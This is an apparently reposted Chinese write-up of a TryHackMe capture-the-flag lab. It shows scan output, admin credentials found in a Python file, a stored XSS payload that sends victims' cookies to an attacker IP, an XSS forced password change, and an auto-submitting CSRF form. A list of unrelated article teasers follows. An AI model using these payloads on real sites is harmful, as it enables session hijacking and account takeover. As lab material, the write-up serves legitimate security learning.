THM Whats Your Name WP

信息收集

[2025-08-28 21:41:30] [SUCCESS] 端口開放 10.10.208.188:80[2025-08-28 21:41:30] [SUCCESS] 端口開放 10.10.208.188:22[2025-08-28 21:41:31] [SUCCESS] 端口開放 10.10.208.188:8081[2025-08-28 21:41:31] [SUCCESS] 服務識別 10.10.208.188:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.3 產品:OpenSSH 系統:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.3.][2025-08-28 21:41:36] [SUCCESS] 服務識別 10.10.208.188:80 => [http][2025-08-28 21:41:36] [SUCCESS] 服務識別 10.10.208.188:8081 => [http][2025-08-28 21:41:36] [INFO] 存活端口數量: 3[2025-08-28 21:41:36] [INFO] 開始漏洞掃描[2025-08-28 21:41:36] [INFO] 加載的插件: ssh, webpoc, webtitle[2025-08-28 21:41:37] [SUCCESS] 網站標題 http://10.10.208.188 ? ?  狀態碼:200 長度:70 ? ? 標題:無標題[2025-08-28 21:41:38] [SUCCESS] 網站標題 http://10.10.208.188:8081 狀態碼:200 長度:70 ? ? 標題:無標題

添加映射關系

10.10.208.188 worldwap.thm

進去80端口注冊一個用戶后

繼續添加

10.10.208.188 login.worldwap.thm

版主flag

再訪問之后看一下返回包,提示訪問login.php

我們在這里可以發現

訪問后返回了一個cookie,而且沒有設置http-only屬性,這就可能造成cookie竊取,我們在注冊頁面測試一下,然后把之前的cookie刪除后訪問login.php

成功返回,那就把cookie給拿過來

<script>fetch('http://10.11.133.25/?'+btoa(document.cookie));</script>

進行base64解碼即可拿到對應cookie,我們再次訪問http://worldwap.thm/public/html/會被重定向到http://worldwap.thm/public/html/dashboard.php,同時訪問http://login.worldwap.thm/login.php會被重定向到http://login.worldwap.thm/profile.php

至此拿到了第一個flag

管理面板flag

非預期

呃,有非預期,那就是掃目錄發現了

[21:51:44] 200 - ?  5KB - /admin.py[21:52:05] 200 -  639B  - /assets/[21:52:05] 301 -  325B  - /assets  ->  http://login.worldwap.thm/assets/[21:52:14] 302 - ?  0B  - /chat.php  ->  login.php[21:52:23] 200 - ?  0B  - /db.php[21:52:47] 301 -  329B  - /javascript  ->  http://login.worldwap.thm/javascript/[21:52:53] 200 -  960B  - /login.php[21:52:54] 302 - ?  0B  - /logout.php  ->  login.php[21:52:54] 200 - ?  0B  - /logs.txt[21:53:12] 301 -  329B  - /phpmyadmin  ->  http://login.worldwap.thm/phpmyadmin/[21:53:15] 200 - ?  3KB - /phpmyadmin/doc/html/index.html[21:53:17] 200 - ?  3KB - /phpmyadmin/[21:53:17] 200 - ?  3KB - /phpmyadmin/index.php[21:53:20] 302 - ?  0B  - /profile.php  ->  login.php[21:53:28] 403 -  283B  - /server-status[21:53:28] 403 -  283B  - /server-status/[21:53:30] 200 - ? 96B  - /setup.php

admin.py里面有賬號密碼

# Admin credentials (for demonstration purposes)username = 'admin'password = 'Un6u3$$4Bl3!!'

直接登錄了

XSS

<script>alert(1)</script>

成功彈窗,現在可以說有兩個思路,一個拿cookie,一個改密碼

因為在改密碼界面發現請求包是

POST /change_password.php HTTP/1.1Host: login.worldwap.thmCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6779.57 Safari/537.36sec-ch-ua-mobile: ?0Accept-Language: zh-CN,zh;q=0.9Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://login.worldwap.thm/change_password.phpOrigin: http://login.worldwap.thmCookie: PHPSESSID=7mm8j1r8iouk3n4c4sm18cp8kssec-ch-ua-platform: "Linux"Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="134", "Google Chrome";v="134"Content-Length: 19?new_password=123456

直接強制讓其改密,可以XSS,也可以CSRF實現

<script>fetch('/change_password.php',{method:'POST',headers:{'Content-Type':'application/x-www-form-urlencoded'},body:"new_password=123456"});</script>

CSRF

csrf更簡單,給他發送鏈接就行了,poc都可以一鍵生成,當然需要稍加修改,這個生成的不能自動發送,讓ai改一下就行

http://10.11.133.25/csrf.html?<html><body><form action="http://login.worldwap.thm/change_password.php" method="POST" name="form1" enctype="application/x-www-form-urlencoded"><input type="hidden" name="new_password" value="123456"/><input type="submit" value="Submit request" /></form><script>document.forms['form1'].submit();history.pushState('', '', '/');</script></body></html>

成功點擊訪問,修改密碼成功

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/diannao/97220.shtml
繁體地址,請注明出處:http://hk.pswp.cn/diannao/97220.shtml
英文地址,請注明出處:http://en.pswp.cn/diannao/97220.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

MySQL底層數據結構與算法淺析

1、概述 MySQL中&#xff0c;當我們發現某個sql的執行時間很長時&#xff0c;最先想到的就是給表加索引&#xff0c;加了索引之后&#xff0c;查詢性能就會有顯著的提升。 為了知其所以然&#xff0c;那么只有去了解MySQL的底層儲存結構和索引的查詢算法&#xff0c;只有這樣才…

VisualStudio 將xlsx文件嵌入到資源中訪問時變String?

如題&#xff0c;就是這么詭異&#xff0c;時至如今已經是visual studio 2022了&#xff0c;你通過界面導入xlsx文件到資源中&#xff0c;它的類型就是String而且沒法修改! 即使將文件壓縮成zip再導入&#xff0c;依然是String&#xff01; 三哥的騷操作問你服不服! 然而&#…

【視頻講解】R語言海七鰓鰻性別比分析:JAGS貝葉斯分層邏輯回歸MCMC采樣模型應用

全文鏈接&#xff1a;https://tecdat.cn/?p43774 原文出處&#xff1a;拓端抖音號拓端tecdat 分析師&#xff1a;Yifei Liu 【視頻講解】R語言海七鰓鰻性別比分析&#xff1a;JAGS貝葉斯分層邏輯回歸引言&#xff1a;生態人都懂的痛——樣本少、結果被質疑&#xff0c;咋辦&am…

Android14 USB子系統的啟動以及動態切換相關的init.usb.rc詳解

init.usb.rc的作用是在Android系統啟動和運行時&#xff0c;通過監聽屬性&#xff08;sys.usb.config和sys.usb.configfs, sys.usb.typec.mode&#xff09;變化動態&#xff0c;通過寫入內核接口 /sys/class/android_usb/ 來配置USB模式。1 USB子系統的啟動1.1 on init階段的配…

宜春城區SDH網圖分析

一、SDH網圖展示 圖片來源&#xff1a; 本地網傳輸網組SDH網圖(2014年12月) - 百度文庫 SDH就是Synchronous Digital Hierarchy&#xff0c;同步數字體系的意思。 從分布圖可以看出&#xff0c;城區網和工業網一樣&#xff0c;是環狀結構&#xff0c;保障數據傳輸的穩定。我的…

lwIP MQTT 心跳 Bug 分析與修復

一、背景在使用 lwIP 內置 MQTT 客戶端時&#xff0c;如果你用的是 2.2.0 之前的版本&#xff0c;很可能會遇到一個惱人的問題&#xff1a;客戶端和服務器正常連接&#xff0c;但一段時間后 會話被 broker 踢掉。比如常見的現象&#xff1a;Mosquitto / EMQX 日志顯示客戶端超時…

Golang 面試題「中級」

以下是 100 道 Golang 中級面試題及答案&#xff0c;涵蓋并發編程、內存管理、接口實現、標準庫深入應用等核心知識點&#xff1a; 一、并發編程基礎與進階問題&#xff1a;Golang 的 GPM 調度模型中&#xff0c;G、P、M 分別代表什么&#xff1f;它們的協作關系是怎樣的&#…

沃爾瑪AI系統Wally深度拆解:零售業庫存周轉提速18%,動態定價爭議與員工轉型成熱議點

最近去沃爾瑪購物&#xff0c;發現以前總斷貨的那款早餐麥片居然常年擺在最顯眼的貨架上&#xff0c;而且價格每周末都會微調——這可不是巧合&#xff0c;背后藏著零售業最硬核的AI操作。沃爾瑪去年推出的智能系統Wally&#xff0c;正悄悄改變著我們買東西的體驗和商家的運營邏…

AutoDL算力云上傳文件太慢了如何解決?

----------------------------------------------------------------------------------------------- 這是我在我的網站中截取的文章&#xff0c;有更多的文章歡迎來訪問我自己的博客網站rn.berlinlian.cn&#xff0c;這里還有很多有關計算機的知識&#xff0c;歡迎進行留言或…

【智慧城市】2025年中國地質大學(武漢)暑期實訓優秀作品(2):智慧城市西安與一帶一路

PART 01 項目背景01政策與時代背景近年來&#xff0c;隨著科技的飛速發展和政策的積極推動&#xff0c;我國新型智慧城市建設取得了顯著成效。在“十四五”國家信息化規劃中&#xff0c;明確提出要打造智慧高效的城市治理體系&#xff0c;推動城市管理精細化、服務智能化。同時…

MySQL數據庫精研之旅第十四期:索引的 “潛規則”(上)

專欄&#xff1a;MySQL數據庫成長記 個人主頁&#xff1a;手握風云 目錄 一、索引簡介 1.1. 索引是什么 1.2. 為什么需要索引 二、索引應該選擇哪種數據結構 2.1. Hash 2.2. 二叉搜索樹 2.3. N叉樹 2.4. B樹 三、MySQL中的頁 3.1. 為什么要使用頁 3.2. 頁文件頭和頁…

架構設計——云原生與分布式系統架構

** 云原生與分布式系統架構** 5.1 云選型策略&#xff1a;多云、混合云還是單云&#xff1f;如何決定&#xff1f; “上云”已無需討論&#xff0c;但“上什么云”是第一個戰略決策。單云&#xff08;Single Cloud&#xff09;策略&#xff1a; 描述&#xff1a; 將全部資源集中…

Python圖片轉WebP常用庫推薦:Pillow、Wand、cv2

摘要 Python轉換圖片為WebP&#xff0c;Pillow最推薦&#xff1a;安裝簡單&#xff08;pip install pillow&#xff09;、使用方便&#xff0c;代碼示例顯示處理RGBA轉RGB等細節&#xff0c;適合多數場景&#xff1b;Wand功能更強基于ImageMagick&#xff0c;適合需高級處理的場…

Android WPS Office 18.20

WPS Office是一款集Word&#xff0c;PDF&#xff0c;Sheet&#xff0c;PowerPoint&#xff0c;表格&#xff0c;文檔&#xff0c;云存儲&#xff0c;模板庫和在線編輯與共享于一體的多功能免費辦公套件。它提供類似于Microsoft Office的功能&#xff0c;包括文字處理、表格編輯…

Elasticsearch核心配置與性能優化

以下是Elasticsearch&#xff08;ES&#xff09;的 核心配置項 及 性能優化措施&#xff0c;涵蓋硬件、系統、ES配置、索引設計等關鍵方面&#xff0c;幫助提升集群穩定性與查詢性能&#xff1a;一、硬件與系統層優化內存分配 堆內存&#xff08;Heap Size&#xff09;&#xf…

【谷歌瀏覽器】瀏覽器實用自用版——谷歌瀏覽器(Google Chrome)離線純凈版安裝 官方版無任何捆綁及廣告 【離線安裝谷歌瀏覽器】

經常上網的朋友們肯定深有體會&#xff1a;如今不少瀏覽器動不動就彈廣告、塞插件&#xff0c;用起來簡直是折磨。面對這些“全家桶”式捆綁&#xff0c;大家都渴望能找到一款干凈、簡潔、無打擾的瀏覽器——這時候&#xff0c;Google Chrome&#xff08;谷歌瀏覽器&#xff09…

2025年滲透測試面試題總結-39(題目+回答)

安全領域各種資源&#xff0c;學習文檔&#xff0c;以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具&#xff0c;歡迎關注。 目錄 3. SAST&#xff08;靜態應用安全測試&#xff09; 4. IAST&#xff08;交互式應用安全測試&#xff09; …

網站測試報告:WEB應用反CSRF的本質與防御機制

CSRF (跨站請求偽造) 本質&#xff1a; 攻擊者誘騙已登錄目標站點的用戶&#xff0c;在不知情的情況下提交一個惡意請求。該請求利用用戶瀏覽器中已存儲的認證信息&#xff08;如Cookie、Session&#xff09;&#xff0c;以該用戶的身份執行未授權的操作&#xff08;如修改密碼…

2025年9月計算機二級C++語言程序設計——選擇題打卡Day10

備考計算機二級 C 程序設計考試&#xff0c;選擇題是不容忽視的重要部分。 今天為大家帶來 10 道難點選擇題&#xff0c;聚焦繼承、多態等核心難點&#xff0c;助力提升解題精度。 1、有如下程序&#xff1a; #include<iostream> using namespace std; class Base { pub…

Formdata表單數據提交

前言&#xff1a;在表單數據提交中&#xff0c;常常除了字符串拼接的方式傳給后端&#xff0c;一般可能還需要使用Fromdata的格式包裝所要提交的表單數據傳遞。常用場景&#xff1a;表單數據提交一、Formdata的優勢使用 FormData 主要是因為它有兩個獨特優勢&#xff1a;能輕松…